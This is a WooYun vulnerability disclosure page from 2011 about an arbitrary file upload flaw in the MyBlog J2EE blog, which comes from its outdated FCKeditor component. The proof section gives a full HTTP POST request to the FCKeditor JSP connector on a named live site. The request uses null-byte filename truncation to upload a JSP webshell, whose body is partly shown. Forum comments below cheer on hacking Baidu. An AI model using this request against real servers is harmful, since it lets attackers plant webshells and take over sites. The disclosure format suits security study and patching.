当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02012

漏洞标题:MyBlog存在任意文件上传漏洞

相关厂商:MyBlog

漏洞作者: BNE

提交时间:2011-04-29 18:08

修复时间:2011-04-29 18:17

公开时间:2011-04-29 18:17

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-04-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-04-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

MyBlog是一个J2ee的开源自建blog系统,攻击者通过他的一些组件问题,可以上传任意文件。

详细说明:

由于使用了早期版本的fckeditor。导致可以通过文件名截断,绕过后缀名验证,上传任意文件。

漏洞证明:

提交如下http包,即可上传shell
http://jdkcn.comhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/Image/b.jsp

POST /FCK/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F HTTP/1.1
Accept: */*
Accept-Language: en-US,zh-cn;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)
Content-Type: multipart/form-data; boundary=---------------------------7d9cb26524ee
Host: jdkcn.com
Content-Length: xxxxxx
Cache-Control: no-cache
-----------------------------7d9cb26524ee
Content-Disposition: form-data; name="NewFile"; filename="b.jsp(此处为null字符).jpg"
Content-Type: text/plain
<%@ page contentType="text/html; charset=GBK" %>
<%@ page import="java.io.*"%>
<%@ page import="java.nio.charset.Charset"%>
<%@ page import="java.util.regex.*"%>
..........
.......
......
...
-----------------------------7d9cb26524ee--


修复方案:

修复fckeditor组件吧。

版权声明:转载请注明来源 BNE@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:10 (WooYun评价)

漏洞评价:

评论

  1. 2011-04-30 00:19 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    看来楼主是关注了前几天百度营销平台被黑的事情...

  2. 2011-05-08 22:07 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    我说是这里有漏洞嘛 xiaoyu还和我打马虎眼

  3. 2011-05-09 14:53 | c4rp3nt3r ( 实习白帽子 | Rank:70 漏洞数:10 | 人生的意义就在于从一个圈子跳到另一个更大...)

    顶黑客黑百度

  4. 2011-05-10 22:32 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    黑百度黑的爽啊!给力!要是能黑谷歌就好了

  5. 2011-05-20 14:03 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)

    嘿嘿 好玩咯

  6. 2011-10-19 18:52 | w0lfram ( 路人 | Rank:7 漏洞数:2 | 流氓无罪,文化可耻。)

    ...